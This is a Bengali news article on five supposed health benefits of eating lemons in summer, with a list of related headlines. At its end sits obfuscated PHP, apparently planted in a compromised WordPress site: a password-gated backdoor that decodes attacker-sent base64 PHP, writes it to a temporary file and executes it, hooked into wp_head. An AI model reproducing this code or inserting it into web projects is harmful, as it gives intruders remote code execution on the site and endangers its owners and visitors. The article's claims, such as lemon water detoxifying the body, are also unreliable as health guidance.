শনিবার, ২২শে জুন, ২০২৪ খ্রিস্টাব্দ ৮ই আষাঢ়, ১৪৩১ বঙ্গাব্দ

গরমে লেবু খাওয়ার ৫ উপকারিতা

news-image

লাইফস্টাইল ডেস্ক : লেবু একটি জনপ্রিয় সাইট্রাস ফল যা সতেজ স্বাদ এবং অসংখ্য স্বাস্থ্য সুবিধার জন্য পরিচিত। খাদ্যতালিকায় লেবু যোগ করলে, বিশেষ করে গরমের মাসগুলোতে, বিভিন্ন ধরনের স্বাস্থ্য উপকারিতা পাওয়া যায়। লেবুতে প্রচুর পরিমাণে ভিটামিন সি এবং ফাইবার রয়েছে, পাশাপাশি খনিজ এবং প্রয়োজনীয় তেল রয়েছে। এই টক ফল অসংখ্য স্বাস্থ্য সুবিধা দেয়। লেবু আপনার হৃদরোগ এবং কিডনিতে পাথর হওয়ার সম্ভাবনা কমাতে সাহায্য করতে পারে। চলুন জেনে নেওয়া যাক গরমে লেবু খাওয়ার উপকারিতা-

১. হাইড্রেশন বাড়ায়
গরমে হাইড্রেটেড থাকা গুরুত্বপূর্ণ। লেবু পানি পান করলে শরীরে পানির ঘাটতি পূরণ সহজ হয়। লেবুর ট্যাঞ্জি স্বাদ আপনাকে আরও পানি পান করতে উৎসাহিত করে। সেইসঙ্গে এটি ডিহাইড্রেশন প্রতিরোধ করতে এবং আপনার শরীরকে সর্বোত্তমভাবে কাজ করতে সহায়তা করে।

২. ভিটামিন সি সমৃদ্ধ
লেবু ভিটামিন সি এর একটি চমৎকার উৎস। এই ভিটামিন হলো অপরিহার্য পুষ্টি যা রোগ প্রতিরোধ ক্ষমতা বাড়াতে কাজ করে। ভিটামিন সি ত্বককে সূর্য এবং দূষণের কারণে ক্ষতির হাত থেকে রক্ষা করতে সাহায্য করে, কোলাজেন উৎপাদন বৃদ্ধি করে এবং উদ্ভিদ-ভিত্তিক খাবার থেকে আয়রনের শোষণ বাড়ায়।

৩. হজমে সাহায্য করে
লেবুর রস পিত্ত উৎপাদনকে বৃদ্ধি করে হজমে সহায়তা করতে পারে। এটি বদহজমের উপসর্গ যেমন বুকজ্বালা এবং পেটফাঁপা দূর করতেও সাহায্য করে। সকালে উষ্ণ লেবু পানি করলে তা আপনার হজম প্রক্রিয়াকে উদ্দীপিত করতে সাহায্য করতে পারে।

৪. ওজন কমাতে সাহায্য করে
লেবুতে ক্যালোরি কম এবং ওজন কমানোর প্রক্রিয়ায় এটি একটি দুর্দান্ত সংযোজন হতে পারে। লেবুতে থাকা পেকটিন ফাইবার আপনাকে দীর্ঘ সময়ের জন্য পেট ভরিয়ে রাখতে সাহায্য করে, যা সামগ্রিক ক্যালোরি গ্রহণ কমিয়ে দেয়।

৫. স্বাস্থ্যকর ত্বক
লেবুতে থাকা অ্যান্টিঅক্সিডেন্ট, বিশেষ করে ভিটামিন সি, ত্বকের ক্ষতি এবং অকাল বার্ধক্য কমাতে সাহায্য করে। ভিটামিন সি কোলাজেন উৎপাদনের জন্যও গুরুত্বপূর্ণ, যা আপনার ত্বককে দৃঢ় এবং তারুণ্যদীপ্ত রাখে। লেবু পানি পান আপনার শরীরকে ডিটক্সিফাই করতে এবং আপনার ত্বকের সামগ্রিক উন্নতি করতে সাহায্য করে।

এ জাতীয় আরও খবর

গোপালগঞ্জে ‘কথা বলা’ গাছের পেছনে ছুটছে মানুষ!

১১ ওভারে ১৩০ করে রান রেট বাড়িয়ে নিল উইন্ডিজ

ছয় মাসের অন্তঃসত্ত্বা দীপিকা, বেবিবাম্প নিয়ে এলেন প্রকাশ্যে

বেশি মাংসে স্বাস্থ্যঝুঁকি

সানিয়া-শামির বিয়ের গুঞ্জন, মুখ খুললেন টেনিস সুন্দরীর বাবা

সকালেই এক পশলা বৃষ্টিতে ভিজল ঢাকা

পবিত্র হজ পালন শেষে দেশে ফিরেছেন ৩৯২০ জন‌, ৩৫ হাজীর মৃত্যু

গান ছাড়া জীবন অচল অভিনেত্রী মিমির!

বিচ্ছেদ লড়াইয়ের মাঝে সন্তান চাইলেন ব্রাড পিট

গোল মিসের মহড়া: অপেক্ষা বাড়ল ফ্রান্স ও ডাচদের

গাজায় রেড ক্রিসেন্ট দপ্তরের কাছে হামলা, নিহত ২২

অংশীদারত্বের উন্নয়নে প্রধানমন্ত্রীর নির্দেশনার প্রশংসা জয়শঙ্ক‌রের

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}